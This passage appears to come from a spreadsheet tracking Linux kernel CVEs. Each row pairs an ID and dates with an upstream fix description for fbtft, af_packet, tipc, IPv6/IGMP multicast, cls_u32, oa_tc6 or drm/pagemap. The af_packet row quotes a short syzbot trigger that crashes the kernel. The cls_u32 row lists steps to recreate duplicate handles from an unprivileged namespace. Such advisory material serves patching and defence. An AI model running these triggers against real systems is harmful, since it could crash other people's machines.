          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: fbtft: make dirty_lock IRQ-safe
fbtft_mkdirty() can be reached from the fbcon rendering path while
processing printk() in hardirq context. Meanwhile, dirty_lock is also
taken by fbtft_deferred_io() in workqueue context with local interrupts
enabled.
Lockdep reports a possible IRQ lock inversion involving dirty_lock and
console_owner. A hardirq can interrupt a CPU holding dirty_lock and
enter the console rendering path, which can attempt to acquire
dirty_lock again.
The following lockdep report was observed on an RK3566 system with
CONFIG_PROVE_LOCKING enabled:
  WARNING: possible irq lock inversion dependency detected
  swapper/2/0 just changed the state of lock:
  (console_owner){-...}-{0:0}
  but this lock took another, HARDIRQ-unsafe lock in the past:
  (&amp;par-&gt;dirty_lock){+.+.}-{2:2}
  CPU0                    CPU1
  ----                    ----
  lock(&amp;par-&gt;dirty_lock);
                         local_irq_disable();
                         lock(console_owner);
                         lock(&amp;par-&gt;dirty_lock);
  &lt;Interrupt&gt;
    lock(console_owner);
  *** DEADLOCK ***
Use spin_lock_irqsave() for fbtft_mkdirty() and spin_lock_irq() for
fbtft_deferred_io(). They only access the dirty line range, so the
IRQ-off regions remain short.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98094</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98095</t>
        </is>
      </c>
      <c r="D718" s="5" t="inlineStr"/>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="inlineStr"/>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr"/>
      <c r="S718" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
af_packet: Don't cast tpacket_hdr.tp_len to int in tpacket_parse_header().
syzbot reported BUG() in sock_sendmsg_nosec(). [0]
The problem is that tpacket_parse_header() casts user-provided
tpacket_hdr.tp_len, which is u32, to int.
If the length is larger than INT_MAX, the following condition
in tpacket_parse_header() passes,
  if (unlikely(tp_len &gt; size_max))
and any negative value can be returned to the caller, up to
sock_sendmsg_nosec().
The repro set tpacket_hdr.tp_len to 0xfffffdef, which is cast
to -EIOCBQUEUED (-529), triggering BUG() in sock_sendmsg_nosec().
  *(uint64_t*)0x200000000008 = 0xfffffdef;
  ...
  syscall(__NR_write, /*fd=*/r[0], /*buf=*/0x200000000000ul, /*count=*/1ul);
Let's define the local tp_len as u32 in tpacket_parse_header().
[0]:
kernel BUG at net/socket.c:803!
Oops: invalid opcode: 0000 [#1] SMP KASAN PTI
CPU: 0 UID: 0 PID: 5628 Comm: syz-executor176 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
RIP: 0010:sock_sendmsg_nosec+0x145/0x180 net/socket.c:803
Code: 06 67 48 0f b9 3a eb 95 e8 e8 3a 22 f8 48 89 df 4c 89 f6 4c 89 e2 4d 89 fb 2e e8 32 a5 5c 16 e9 51 ff ff ff e8 cc 3a 22 f8 90 &lt;0f&gt; 0b e8 c4 3a 22 f8 48 83 c3 18 48 89 d8 48 c1 e8 03 42 80 3c 28
RSP: 0018:ffffc90003aefb48 EFLAGS: 00010293
RAX: ffffffff89a578d4 RBX: ffff8880764c67c0 RCX: ffff88807fb23e80
RDX: 0000000000000000 RSI: 00000000fffffdef RDI: 00000000fffffdef
RBP: 00000000fffffdef R08: ffffc90003aef747 R09: 1ffff9200075dee8
R10: dffffc0000000000 R11: fffff5200075dee9 R12: 0000000000000001
R13: dffffc0000000000 R14: ffffc90003aefbc0 R15: ffffffff8aac4310
FS:  000055559101b400(0000) GS:ffff888124ce0000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000210 CR3: 0000000073dca000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 __sock_sendmsg net/socket.c:815 [inline]
 sock_write_iter+0x2de/0x3e0 net/socket.c:1266
 new_sync_write fs/read_write.c:595 [inline]
 vfs_write+0x612/0xba0 fs/read_write.c:687
 ksys_write+0x150/0x270 fs/read_write.c:739
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x166/0x520 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f173130ecb9
Code: c0 79 93 eb d5 48 8d 7c 1d 00 eb 99 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 d8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffd67e44248 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 0000200000000000 RCX: 00007f173130ecb9
RDX: 0000000000000001 RSI: 0000200000000000 RDI: 0000000000000003
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd67e44388
R13: 0000000000000002 R14: 00002000000000c0 R15: 0000000000000002
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98095</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98097</t>
        </is>
      </c>
      <c r="D719" s="5" t="inlineStr"/>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="inlineStr"/>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr"/>
      <c r="S719" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tipc: Dont send random pad bytes in RESET/ACTIVATE messages
The interface name is passed in a fixed length (TIPC_MAX_IF_NAME) buffer.
Replace the strcpy(data, l-&gt;if_name) with memcpy() so that the
pad bytes are actually written (l-&gt;if_name[] is zero padded)
rather than sending random bytes from the skb to the remote system.
Replace two other strcpy() with strscpy().</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98097</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98098</t>
        </is>
      </c>
      <c r="D720" s="5" t="inlineStr"/>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="inlineStr"/>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr"/>
      <c r="S720" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tipc: fix NULL deref in tipc_named_node_up() on empty publication list
User-space applications can bind a large number of service addresses to
one or more sockets. Each binding of a local-scope service address inserts
one entry (publication) into the TIPC name table. If the number of these
publications exceeds TIPC_MAX_PUBL (65535), protocol service types
(such as node state and link state) are no longer inserted into the name
table. This causes two issues:
1. User-space applications subscribing to node or link up/down events
   stop receiving notifications.
2. A NULL pointer dereference can occur:
   BUG: kernel NULL pointer dereference, address: 00000000000000d0
   ...
   CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 7.2.0-rc4-default+ #5 PREEMPT(full)
   ...
   RIP: 0010:tipc_named_node_up (./include/linux/skbuff.h:2251 net/tipc/name_distr.c:195 net/tipc/name_distr.c:221)
   ...
   Call Trace:
   &lt;IRQ&gt;
   tipc_node_write_unlock (net/tipc/node.c:428)
   tipc_rcv (net/tipc/node.c:934 net/tipc/node.c:2189)
   tipc_udp_recv (net/tipc/udp_media.c:389)
   Thread 1 (tipc_net_finalize) | Thread 2 (named_distribute)
   -----------------------------|-----------------------------
                                | ...
                                | list_for_each_entry(publ, pls, binding_node) {
                                | ...
                                | __skb_queue_tail(list, skb);
                                | ...
                                | }
                                | ...
                                | hdr = buf_msg(skb_peek_tail(list));
   ...                          |
   tipc_nametbl_publish();      |
   If 'tipc_nametbl_publish()' (Thread 1) fails because the number of
   local publications reaches TIPC_MAX_PUBL, list (Thread 2) will be empty. As a
   result, NULL is passed to 'buf_msg()', leading to a NULL pointer dereference.
Fix these issues by allowing protocol service types (node state, link state,
and topology server) to be inserted into the name table unconditionally.
This ensures that users subscribing to these types always receive
notifications. In addition, the maximum number of local user publications is
reduced to (TIPC_MAX_PUBL - 1). This ensures that the maximum bulk size
calculated in tipc_link_set_queue_limits() remains valid.</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98098</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98099</t>
        </is>
      </c>
      <c r="D721" s="5" t="inlineStr"/>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="inlineStr"/>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr"/>
      <c r="S721" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: use rcu_assign_pointer() for __rcu list updates
Several places in net/ipv6/mcast.c update RCU-protected lists
(np-&gt;ipv6_mc_list, idev-&gt;mc_list, idev-&gt;mc_tomb) using direct pointer
assignments instead of rcu_assign_pointer():
1. In __ipv6_dev_mc_dec(), unlinking a group from idev-&gt;mc_list did:
       *map = ma-&gt;next;
   without rcu_assign_pointer() while concurrent readers traverse
   idev-&gt;mc_list locklessly under rcu_read_lock().
2. In ipv6_sock_mc_drop() and __ipv6_sock_mc_close(), unlinking a group
   from np-&gt;ipv6_mc_list directly assigned *lnk = mc_lst-&gt;next and
   np-&gt;ipv6_mc_list = mc_lst-&gt;next without rcu_assign_pointer(), racing
   with lockless readers in inet6_mc_check().
3. In __ipv6_sock_mc_join(), mc_lst-&gt;next was initialized to
   np-&gt;ipv6_mc_list via raw assignment before publishing mc_lst.
4. In mld_del_delrec() and __ipv6_dev_mc_inc(), __rcu source pointers
   passed into rcu_assign_pointer() lacked explicit dereference helpers.
Fix these by consistently using rcu_assign_pointer() along with
mc_dereference() / sock_dereference().</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98099</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98101</t>
        </is>
      </c>
      <c r="D722" s="5" t="inlineStr"/>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="inlineStr"/>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr"/>
      <c r="S722" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: use copy-on-write RCU updates in ip6_mc_source()
pmc-&gt;sflist is read locklessly under rcu_read_lock() by
inet6_mc_check() during packet reception in the UDP and RAW
multicast receive paths.
ip6_mc_source() mutated psl-&gt;sl_addr and psl-&gt;sl_count in-place
when adding or removing a source filter. Additionally, when expanding
the filter buffer, newpsl was published via rcu_assign_pointer()
before writing the new source into the array.
Because 16-byte struct in6_addr writes are not atomic and array
shifting is not synchronized with RCU readers, concurrent readers in
inet6_mc_check() could read torn IPv6 addresses or observe
duplicated/missed source entries.
Fix this by switching ip6_mc_source() to copy-on-write RCU updates:
allocate and fully populate newpsl before publishing it via
rcu_assign_pointer(), and reclaim the old filter via kfree_rcu(),
matching ip6_mc_msfilter().
Also remove the now unused IP6_SFBLOCK macro.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98101</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98102</t>
        </is>
      </c>
      <c r="D723" s="5" t="inlineStr"/>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="inlineStr"/>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr"/>
      <c r="S723" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: fix RCU list diversion in ip6_mc_del1_src()
When removing a source filter whose count reaches zero, ip6_mc_del1_src()
unlinks psf from pmc-&gt;mca_sources. If the filter was previously active,
the code moved psf directly into pmc-&gt;mca_tomb by updating psf-&gt;sf_next.
Because pmc-&gt;mca_sources is traversed locklessly under RCU (e.g. by
ipv6_chk_mcast_addr()), mutating psf-&gt;sf_next before a grace period
elapses diverts concurrent readers to the tombstone list. Consequently,
readers miss remaining active sources in pmc-&gt;mca_sources and improperly
examine deleted tombstone entries.
Fix this by allocating a new tombstone node for pmc-&gt;mca_tomb (as done
in sf_setstate()) and retiring the original psf via kfree_rcu().</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98102</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98103</t>
        </is>
      </c>
      <c r="D724" s="5" t="inlineStr"/>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="inlineStr"/>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr"/>
      <c r="S724" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
igmp: convert struct ip_sf_list to RCU
Commit 23d2b94043ca ("igmp: Add ip_mc_list lock in ip_check_mc_rcu")
added spin_lock_bh(&amp;im-&gt;lock) to ip_check_mc_rcu() to prevent a
use-after-free while iterating im-&gt;sources during concurrent deletions.
However, ip_check_mc_rcu() is called from RCU read-side critical
sections in packet receive and route lookup fast paths (e.g.
__mkroute_output(), ip_route_input_rcu(), and __udp4_lib_rcv()).
When igmpv3_send_cr() or igmpv3_send_report() holds &amp;pmc-&gt;lock and
calls add_grec() -&gt; igmpv3_newpack() -&gt; ip_route_output_ports(),
an XFRM policy matching a multicast destination triggers
xfrm_tmpl_resolve_one() -&gt; xfrm4_get_saddr() -&gt; __mkroute_output() -&gt;
ip_check_mc_rcu(). This attempts to acquire &amp;im-&gt;lock while &amp;pmc-&gt;lock
is already held on the same CPU, triggering a lockdep recursive locking
warning / deadlock.
Fix this by converting IPv4 struct ip_sf_list to RCU, mirroring the
IPv6 implementation in net/ipv6/mcast.c:
1. Add struct rcu_head to struct ip_sf_list and annotate sf_next,
   sources, and tomb as __rcu pointers.
2. Use rcu_assign_pointer() and kfree_rcu() for list updates and
   deletions.
3. Remove spin_lock_bh(&amp;im-&gt;lock) from ip_check_mc_rcu() and traverse
   im-&gt;sources locklessly with for_each_psf_rcu(), reading and writing
   counter fields with READ_ONCE() and WRITE_ONCE().
Note: RCU conversion of /proc/net/mcfilter will be done in a
separate patch.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98103</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98104</t>
        </is>
      </c>
      <c r="D725" s="5" t="inlineStr"/>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="inlineStr"/>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr"/>
      <c r="S725" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_u32: fix duplicate handle when node ID pool is exhausted
gen_new_kid() falls back to returning max (htid | 0xFFF) when both
idr_alloc_u32() ranges are full, instead of reporting an error.
u32_change() trusts that value and inserts a new knode with a handle
that is already live in the hash table, breaking handle uniqueness
within the table's node ID space.
The handle was never reserved in ht-&gt;handle_idr, so every later error
path that does idr_remove(&amp;ht-&gt;handle_idr, handle) removes the
reservation of a different, live knode, which is then reused — one
failed add compounds into further duplicates.
The 4095 limit is per (table, bucket) — ht-&gt;handle_idr is per hash
table and the range is derived from htid (bucketid), so a table with
divisor 256 can legitimately hold 256*4095 knodes.
The sibling helper gen_new_htid() has the same silent in-band failure:
it returns 0 when the tp_c handle pool (1..0x7FF) is full, and
u32_init() publishes the root hash table with handle 0 without
checking.  Two root tables with handle 0 alias in u32_lookup_ht(),
allowing cross-tcf_proto knode add/lookup/delete.  Add the same
exhaustion check that the divisor path already has.
Return an error so u32_change() fails with ENOSPC/ENOMEM when the
node ID space is exhausted, and so u32_init() fails with -ENOMEM
when the hash table ID space is exhausted.  The extack message
distinguishes pool exhaustion (-ENOSPC) from a transient allocation
failure (-ENOMEM).
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_CLS_U32=y (or =m with module loaded)
- Create a clsact qdisc on a device, then add 4095 u32 filters with
  auto-generated handles to fill the node ID space for the root hash
  table (single bucket). The 4096th auto-handle filter add triggers
  the duplicate handle (fh 800::fff reused). Reachable at Level 2
  (unshare -Urn, namespace-local CAP_NET_ADMIN).
- For gen_new_htid: create 2047 u32 proto entries on the same block
  to fill the tp_c handle pool, then create one more. The root table
  gets handle 0 and aliases with other handle-0 root tables.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98104</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98105</t>
        </is>
      </c>
      <c r="D726" s="5" t="inlineStr"/>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="inlineStr"/>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr"/>
      <c r="S726" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: oa_tc6: Improve the error recovery
When oversubscribed traffic causes lot of buffer overflow errors,
probably due to loss of data chunks, driver fails to find a
data chunk with end_valid bit set, before it runs out of sk buffer
space. As a result, assert is seen during skb_put.
Now, check is made if skb buffer has enough tailroom for the
incoming data before accepting. If there is no room, current
frame is abandoned and it will start looking for a data chunk
with start_valid bit, that is a new frame.
SK buffer allocation error is considered as recoverable error.
rx_buf_overflow flag is too specific and no longer the only
condition this flag is used for. Therefore it is renamed as
wait_until_start_valid. This is more appropriate as this flag
is used to look for the next data chunk with SV bit set, after
failures like buffer overflow, buffer allocation failure, skb pointer
validity besides buffer overflow error.
Not writing to status0 if it reads 0.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98105</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98106</t>
        </is>
      </c>
      <c r="D727" s="5" t="inlineStr"/>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="inlineStr"/>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr"/>
      <c r="S727" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/pagemap: Prevent double migration of device pages
A device-private folio migrated to system memory by a CPU fault can
remain reachable through the raw-PFN eviction path until migration
finalization drops the source reference.
If eviction selects the same device-private folio during this window,
it can attempt to migrate the folio again. The second migration can leave
an uncharged folio on an LRU list, causing folio_lruvec_lock_irqsave() to
retry indefinitely and resulting in a soft lockup and RCU stall.
Mark successfully migrated device-private folios using a low bit of
their zone_device_data before migration finalization. Make both CPU-fault
and raw-PFN migration paths skip device-private folios carrying this
flag.
Mask the flag when retrieving the drm_pagemap_zdd pointer and preserve
it when a device-private folio is split. Keeping the state on the physical
folio also avoids depending on a virtual address that may change before a
fault occurs.
v2:
- Replace the retired-PFN XArray with an embedded bitmap. (Matthew Brost)
- Mark every base page covered by a migrated folio so retirement remains
  valid if the folio is later split.
v3:
- Store the migrated state in a low bit of zone_device_data instead of
  adding virtual-range and bitmap tracking to the ZDD. (Matthew Brost)
- Mask the flag when retrieving the ZDD and preserve it when splitting
  a folio.
- Drop the pre-existing fixes already covered by Matthew Brost's series:
  https://patchwork.freedesktop.org/series/171651/
v4:
- Advance by the folio size only for migration entries marked with
  MIGRATE_PFN_COMPOUND. (Sashiko)
v5:
- Simplify ZDD flag updates and folio iteration. (Matthew Brost)
- Skip retired device-private folios in the CPU-fault path. (Matthew Brost)
- Preserve flag bits while taking a new ZDD reference for split folios.
v6:
- Restore MIGRATE_PFN_COMPOUND-aware stepping so non-compound migration
  entries are processed one at a time. (Sashiko)
- Drop the pre-existing fixes already covered by Matthew Brost's series:
  https://patchwork.freedesktop.org/series/171651/
The lockup was observed as:
[10109.860465] watchdog: BUG: soft lockup - CPU#9 stuck for 26s! [kworker/u65:5:6557]
[10109.860524] Tainted: [S]=CPU_OUT_OF_SPEC, [O]=OOT_MODULE
[10109.860524] Hardware name: ASUS System Product Name/PRIME Z790-P WIFI, BIOS 0812 02/24/2023
[10109.860525] Workqueue: xe_page_fault_work_queue xe_pagefault_queue_work [xe]
[10109.860644] RIP: 0010:_raw_spin_unlock_irqrestore+0x57/0x80
[10109.860655] Call Trace:
[10109.860655]  &lt;TASK&gt;
